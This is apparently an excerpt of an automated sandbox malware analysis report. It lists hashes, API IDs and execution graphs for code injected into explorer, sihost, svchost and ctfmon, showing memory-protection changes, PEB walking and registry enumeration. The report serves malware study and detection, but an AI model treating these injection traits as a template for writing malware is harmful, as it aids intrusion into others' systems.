                                                                                                                                                                • Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
                                                                                                                                                                • Instruction Fuzzy Hash: 2C411530608A4E8FDF95EF1CD884BAA7BF4FB69359F40016AF909D7210D730E8848B41
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01341EE1 Relevance: 1.6, APIs: 1, Instructions: 54nativeCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 118 1341ee1-1341f5d NtCreateUserProcess
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                                • Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                • Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
                                                                                                                                                                • Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
                                                                                                                                                                • Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01341D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: fe543ba5981a4b2cd0a471ec537e1e9909e24de02a6f2c7c72e786ac4512fa1f
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: C821E730A34C1D0BFB68A27C9859764F6D2E79C320F980295E90DD36E4ED58DCC183C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01370811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2916329205.0000000001370000.00000040.00000400.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1370000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: ea8e8263a52ffd1b72090123e7935646c661fcb3b5f8d857c32fcc52ac9d5973
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 463159720102057FEF257F748D86ABA7FACEF12318F040166BD85DE0A1EA384954CBB6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01340811 Relevance: 1.6, APIs: 1, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3424019298-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: f828dda867ed27b1dc25a4f885b7e8e46b830c7295b4a0c4c789bd2f8f5b16ba
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 7C313672110205AFFB057B749D86AFA3FECEF10318F040165BE85DA0A6EA306994CAB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 013408B3 Relevance: 1.5, APIs: 1, Instructions: 14threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2912374874.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_1340000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3424019298-0
                                                                                                                                                                • Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                • Instruction ID: bc72de932e0fa4b54f58ad44bb5737dfb27672e31d192ce4b9b4917607245898
                                                                                                                                                                • Opcode Fuzzy Hash: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
                                                                                                                                                                • Instruction Fuzzy Hash: BFC08C27630C0603CE18B37C2D4909839C4ED2102E3C05634A123C00A6D824709642A2
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:105
                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                execution_graph 2501 ac08d9 2507 ac0cc4 2501->2507 2503 ac08e5 2510 ac0643 2503->2510 2505 ac08ef 2518 ac093e 2505->2518 2525 ac0c3f GetPEB 2507->2525 2509 ac0cc9 2509->2503 2511 ac0660 2510->2511 2527 ac067c 2511->2527 2513 ac0673 2533 ac06c2 2513->2533 2515 ac080f 2515->2505 2516 ac06b9 2516->2515 2537 ac0811 2516->2537 2519 ac0cc4 GetPEB 2518->2519 2521 ac094a 2519->2521 2520 ac0af1 2520->2505 2521->2520 2579 ac09d9 2521->2579 2524 ac09d2 2524->2520 2583 ac0af3 2524->2583 2526 ac0c4b 2525->2526 2526->2509 2526->2526 2528 ac0681 2527->2528 2529 ac06c2 4 API calls 2528->2529 2531 ac06b9 2529->2531 2530 ac080f 2530->2513 2531->2530 2532 ac0811 4 API calls 2531->2532 2532->2530 2535 ac06c7 2533->2535 2534 ac080f 2534->2516 2535->2534 2536 ac0811 4 API calls 2535->2536 2536->2534 2550 ac086e 2537->2550 2539 ac0840 2540 ac08c5 2539->2540 2541 ac0866 2539->2541 2543 ac08d9 2539->2543 2565 ac08d9 2540->2565 2541->2515 2555 ac1e62 2541->2555 2545 ac0cc4 GetPEB 2543->2545 2546 ac08e5 2545->2546 2547 ac0643 4 API calls 2546->2547 2548 ac08ef 2547->2548 2549 ac093e 4 API calls 2548->2549 2549->2548 2551 ac0873 2550->2551 2551->2539 2552 ac1e62 3 API calls 2551->2552 2553 ac08c7 2552->2553 2554 ac08d9 4 API calls 2553->2554 2554->2553 2556 ac1e73 2555->2556 2571 ac1d5a 2556->2571 2559 ac1d5a 3 API calls 2560 ac1eb9 2559->2560 2561 ac1d5a 3 API calls 2560->2561 2562 ac1ecc 2561->2562 2563 ac1d5a 3 API calls 2562->2563 2564 ac1edf 2563->2564 2564->2540 2566 ac0cc4 GetPEB 2565->2566 2567 ac08e5 2566->2567 2568 ac0643 4 API calls 2567->2568 2569 ac08ef 2568->2569 2570 ac093e 4 API calls 2569->2570 2570->2569 2572 ac1d6e 2571->2572 2573 ac1e60 2571->2573 2572->2573 2574 ac1d80 VirtualProtect 2572->2574 2573->2559 2574->2573 2575 ac1dac 2574->2575 2576 ac1daf VirtualAlloc 2575->2576 2576->2576 2577 ac1de1 2576->2577 2578 ac1e09 VirtualProtect 2577->2578 2578->2573 2582 ac09de 2579->2582 2580 ac0af3 4 API calls 2581 ac0af1 2580->2581 2581->2524 2582->2580 2582->2581 2585 ac0b01 2583->2585 2586 ac0cc4 GetPEB 2585->2586 2587 ac0b0d 2586->2587 2592 ac0b27 2587->2592 2589 ac0b20 2591 ac0b57 2589->2591 2596 ac0b65 2589->2596 2593 ac0b2c 2592->2593 2594 ac0b65 4 API calls 2593->2594 2595 ac0b57 2594->2595 2595->2589 2597 ac0b6a 2596->2597 2602 ac08b3 2597->2602 2604 ac08b9 2602->2604 2606 ac08c7 2602->2606 2603 ac08d9 4 API calls 2603->2606 2605 ac1e62 3 API calls 2604->2605 2605->2606 2606->2603 2621 ac0b6b 2622 ac0b7d 2621->2622 2623 ac08b3 4 API calls 2622->2623 2624 ac0bb1 2623->2624 2625 ac0c3f GetPEB 2624->2625 2626 ac0bb6 2625->2626 2607 ac21d1 2610 ac21f2 2607->2610 2608 ac2211 NtEnumerateValueKey 2609 ac226c 2608->2609 2608->2610 2610->2608 2610->2609 2611 ac1e62 2612 ac1e73 2611->2612 2613 ac1d5a 3 API calls 2612->2613 2614 ac1ea6 2613->2614 2615 ac1d5a 3 API calls 2614->2615 2616 ac1eb9 2615->2616 2617 ac1d5a 3 API calls 2616->2617 2618 ac1ecc 2617->2618 2619 ac1d5a 3 API calls 2618->2619 2620 ac1edf 2619->2620

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00AC21D1 Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 47 ac21d1-ac21f0 48 ac21f8-ac21fd 47->48 49 ac21f2-ac21f6 47->49 51 ac21ff-ac2203 48->51 52 ac2205-ac2208 48->52 50 ac220a-ac220e 49->50 53 ac2211-ac2244 NtEnumerateValueKey 50->53 51->50 52->53 54 ac226c-ac226f 53->54 55 ac2246-ac2249 53->55 55->54 56 ac224b-ac2256 call ac2196 55->56 59 ac225e-ac2261 56->59 60 ac2258-ac225c 56->60 59->54 61 ac2263-ac226a 59->61 60->59 61->53
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2880966053.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumerateValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1749906896-0
                                                                                                                                                                • Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                • Instruction ID: cdfd058294846393527a23a69d82aed125c299c38b3c44931be5a47ac5480816
                                                                                                                                                                • Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
                                                                                                                                                                • Instruction Fuzzy Hash: F3213D31518E5D8F8F55EF1C8809FEA37E1FB68755B42032AAC19E3200D730D98087C1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00AC1D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2880966053.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: dd34eb1389eaef043c92a696ed53661b54a7e883a9eaaee22049f10a42ac24d8
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: E221F730B34C1D0BEB58A77C9859764F6D2E79C320F990299E91ED36E5ED58CC8183C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00AC0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 11 ac0811-ac0846 call ac086e 14 ac08ad-ac08ae 11->14 15 ac0848-ac0851 11->15 16 ac08af-ac08b0 14->16 15->16 17 ac0853-ac085c 15->17 18 ac08b9-ac08cc call ac1756 call ac1e62 16->18 19 ac085e 17->19 20 ac08d0 17->20 23 ac08d4 call ac08d9 18->23 21 ac08c5-ac08cc 19->21 22 ac0860-ac0861 19->22 20->23 21->20 22->18 26 ac0863 22->26 28 ac08d9-ac0906 call ac0cc4 call ac14bc call ac0643 call ac0ce8 26->28 29 ac0866-ac086f 26->29 44 ac090b-ac090f 28->44 32 ac089e-ac08a4 29->32 33 ac0871-ac0897 29->33 32->14 33->32 45 ac0939 call ac093e 44->45
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2880966053.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 9231E472000204AFEF017F709E86FBA3BACEF11300F424169BD85DA0A2EA7449658BB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:5.1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:69
                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                execution_graph 2511 9108d9 2517 910cc4 2511->2517 2513 9108e5 2520 910643 2513->2520 2515 9108ef 2528 91093e 2515->2528 2535 910c3f GetPEB 2517->2535 2519 910cc9 2519->2513 2521 910660 2520->2521 2537 91067c 2521->2537 2523 910673 2543 9106c2 2523->2543 2525 91080f 2525->2515 2526 9106b9 2526->2525 2547 910811 2526->2547 2529 910cc4 GetPEB 2528->2529 2531 91094a 2529->2531 2530 910af1 2530->2515 2531->2530 2567 9109d9 2531->2567 2534 9109d2 2534->2530 2571 910af3 2534->2571 2536 910c4b 2535->2536 2536->2519 2536->2536 2538 910681 2537->2538 2539 9106c2 GetPEB 2538->2539 2541 9106b9 2539->2541 2540 91080f 2540->2523 2541->2540 2542 910811 GetPEB 2541->2542 2542->2540 2545 9106c7 2543->2545 2544 91080f 2544->2526 2545->2544 2546 910811 GetPEB 2545->2546 2546->2544 2558 91086e 2547->2558 2549 910840 2551 9108d9 2549->2551 2552 910866 2549->2552 2553 910cc4 GetPEB 2551->2553 2552->2525 2561 9108d9 2552->2561 2554 9108e5 2553->2554 2555 910643 GetPEB 2554->2555 2556 9108ef 2555->2556 2557 91093e GetPEB 2556->2557 2557->2556 2559 910873 2558->2559 2559->2549 2560 9108d9 GetPEB 2559->2560 2560->2559 2562 910cc4 GetPEB 2561->2562 2563 9108e5 2562->2563 2564 910643 GetPEB 2563->2564 2565 9108ef 2564->2565 2566 91093e GetPEB 2565->2566 2566->2565 2570 9109de 2567->2570 2568 910af3 GetPEB 2569 910af1 2568->2569 2569->2534 2570->2568 2570->2569 2573 910b01 2571->2573 2574 910cc4 GetPEB 2573->2574 2575 910b0d 2574->2575 2580 910b27 2575->2580 2577 910b20 2584 910b65 2577->2584 2581 910b2c 2580->2581 2582 910b65 GetPEB 2581->2582 2583 910b57 2581->2583 2582->2583 2583->2577 2585 910b6a 2584->2585 2590 9108b3 2585->2590 2591 9108b9 2590->2591 2592 9108d9 GetPEB 2591->2592 2592->2591 2593 910b6b 2594 910b7d 2593->2594 2595 9108b3 GetPEB 2594->2595 2596 910bb1 2595->2596 2597 910c3f GetPEB 2596->2597 2598 910bb6 2597->2598

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00910811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.2888530832.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_910000_svchost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: DE31D67220420C7FEB017B709D46BFA3B6CEF91300F4001A5BD85DA0A2DAB649D5CBB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:5.1%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:69
                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                execution_graph 2593 9a0b6b 2594 9a0b7d 2593->2594 2595 9a08b3 GetPEB 2594->2595 2596 9a0bb1 2595->2596 2597 9a0c3f GetPEB 2596->2597 2598 9a0bb6 2597->2598 2511 9a08d9 2517 9a0cc4 2511->2517 2513 9a08e5 2520 9a0643 2513->2520 2515 9a08ef 2528 9a093e 2515->2528 2535 9a0c3f GetPEB 2517->2535 2519 9a0cc9 2519->2513 2521 9a0660 2520->2521 2537 9a067c 2521->2537 2523 9a0673 2543 9a06c2 2523->2543 2525 9a080f 2525->2515 2526 9a06b9 2526->2525 2547 9a0811 2526->2547 2529 9a0cc4 GetPEB 2528->2529 2530 9a094a 2529->2530 2531 9a0af1 2530->2531 2567 9a09d9 2530->2567 2531->2515 2533 9a09d2 2533->2531 2571 9a0af3 2533->2571 2536 9a0c4b 2535->2536 2536->2519 2536->2536 2538 9a0681 2537->2538 2539 9a06c2 GetPEB 2538->2539 2541 9a06b9 2539->2541 2540 9a080f 2540->2523 2541->2540 2542 9a0811 GetPEB 2541->2542 2542->2540 2545 9a06c7 2543->2545 2544 9a080f 2544->2526 2545->2544 2546 9a0811 GetPEB 2545->2546 2546->2544 2558 9a086e 2547->2558 2549 9a0840 2551 9a08d9 2549->2551 2552 9a0866 2549->2552 2553 9a0cc4 GetPEB 2551->2553 2552->2525 2561 9a08d9 2552->2561 2554 9a08e5 2553->2554 2555 9a0643 GetPEB 2554->2555 2556 9a08ef 2555->2556 2557 9a093e GetPEB 2556->2557 2557->2556 2559 9a0873 2558->2559 2559->2549 2560 9a08d9 GetPEB 2559->2560 2560->2559 2562 9a0cc4 GetPEB 2561->2562 2563 9a08e5 2562->2563 2564 9a0643 GetPEB 2563->2564 2565 9a08ef 2564->2565 2566 9a093e GetPEB 2565->2566 2566->2565 2570 9a09de 2567->2570 2568 9a0af3 GetPEB 2569 9a0af1 2568->2569 2569->2533 2570->2568 2570->2569 2573 9a0b01 2571->2573 2574 9a0cc4 GetPEB 2573->2574 2575 9a0b0d 2574->2575 2580 9a0b27 2575->2580 2577 9a0b20 2584 9a0b65 2577->2584 2581 9a0b2c 2580->2581 2582 9a0b65 GetPEB 2581->2582 2583 9a0b57 2581->2583 2582->2583 2583->2577 2585 9a0b6a 2584->2585 2590 9a08b3 2585->2590 2592 9a08b9 2590->2592 2591 9a08d9 GetPEB 2591->2592 2592->2591

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 009A0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.2883996470.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_9a0000_svchost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 87a61ee7780fe3dd6be775b2a921c89204c80ea1769b2b74f3f30dd65b7be30b
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: DB31E6724102046FEB017B749D4ABBA7BACEF92310F000165BD85DA0A6EA7549648AFA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:8.3%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:101
                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                execution_graph 2502 a51e62 2503 a51e73 2502->2503 2512 a51d5a 2503->2512 2506 a51d5a 3 API calls 2507 a51eb9 2506->2507 2508 a51d5a 3 API calls 2507->2508 2509 a51ecc 2508->2509 2510 a51d5a 3 API calls 2509->2510 2511 a51edf 2510->2511 2513 a51e60 2512->2513 2514 a51d6e 2512->2514 2513->2506 2514->2513 2515 a51d80 VirtualProtect 2514->2515 2515->2513 2516 a51dac 2515->2516 2517 a51daf VirtualAlloc 2516->2517 2517->2517 2518 a51de1 2517->2518 2519 a51e09 VirtualProtect 2518->2519 2519->2513 2520 a508d9 2526 a50cc4 2520->2526 2522 a508e5 2529 a50643 2522->2529 2524 a508ef 2537 a5093e 2524->2537 2544 a50c3f GetPEB 2526->2544 2528 a50cc9 2528->2522 2530 a50660 2529->2530 2546 a5067c 2530->2546 2532 a50673 2552 a506c2 2532->2552 2534 a5080f 2534->2524 2535 a506b9 2535->2534 2556 a50811 2535->2556 2538 a50cc4 GetPEB 2537->2538 2540 a5094a 2538->2540 2539 a50af1 2539->2524 2540->2539 2590 a509d9 2540->2590 2543 a509d2 2543->2539 2594 a50af3 2543->2594 2545 a50c4b 2544->2545 2545->2528 2545->2545 2547 a50681 2546->2547 2548 a506c2 4 API calls 2547->2548 2550 a506b9 2548->2550 2549 a5080f 2549->2532 2550->2549 2551 a50811 4 API calls 2550->2551 2551->2549 2554 a506c7 2552->2554 2553 a5080f 2553->2535 2554->2553 2555 a50811 4 API calls 2554->2555 2555->2553 2569 a5086e 2556->2569 2558 a508c5 2584 a508d9 2558->2584 2559 a50840 2559->2558 2560 a50866 2559->2560 2562 a508d9 2559->2562 2560->2534 2574 a51e62 2560->2574 2564 a50cc4 GetPEB 2562->2564 2565 a508e5 2564->2565 2566 a50643 4 API calls 2565->2566 2567 a508ef 2566->2567 2568 a5093e 4 API calls 2567->2568 2568->2567 2570 a50873 2569->2570 2570->2559 2571 a51e62 3 API calls 2570->2571 2572 a508c7 2571->2572 2573 a508d9 4 API calls 2572->2573 2573->2572 2575 a51e73 2574->2575 2576 a51d5a 3 API calls 2575->2576 2577 a51ea6 2576->2577 2578 a51d5a 3 API calls 2577->2578 2579 a51eb9 2578->2579 2580 a51d5a 3 API calls 2579->2580 2581 a51ecc 2580->2581 2582 a51d5a 3 API calls 2581->2582 2583 a51edf 2582->2583 2583->2558 2585 a50cc4 GetPEB 2584->2585 2586 a508e5 2585->2586 2587 a50643 4 API calls 2586->2587 2588 a508ef 2587->2588 2589 a5093e 4 API calls 2588->2589 2589->2588 2591 a509de 2590->2591 2592 a50af3 4 API calls 2591->2592 2593 a50af1 2591->2593 2592->2593 2593->2543 2596 a50b01 2594->2596 2597 a50cc4 GetPEB 2596->2597 2598 a50b0d 2597->2598 2603 a50b27 2598->2603 2600 a50b20 2602 a50b57 2600->2602 2607 a50b65 2600->2607 2604 a50b2c 2603->2604 2605 a50b65 4 API calls 2604->2605 2606 a50b57 2605->2606 2606->2600 2611 a50b6a 2607->2611 2613 a508b3 2611->2613 2614 a508c7 2613->2614 2615 a508b9 2613->2615 2616 a508d9 4 API calls 2614->2616 2617 a51e62 3 API calls 2615->2617 2616->2614 2617->2614 2618 a50b6b 2620 a50b7d 2618->2620 2619 a508b3 4 API calls 2621 a50bb1 2619->2621 2620->2619 2622 a50c3f GetPEB 2621->2622 2623 a50bb6 2622->2623

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00A51D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2883830888.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: e5dc80538da9fb4d46b28acacc3c2bb4e555f0cc24faa64339f8904ee302d7fe
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: 9621D631A34C1D0BEB58A27C9859774F6E2F79C321F940295ED19D36D4ED68CC8183C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00A50811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
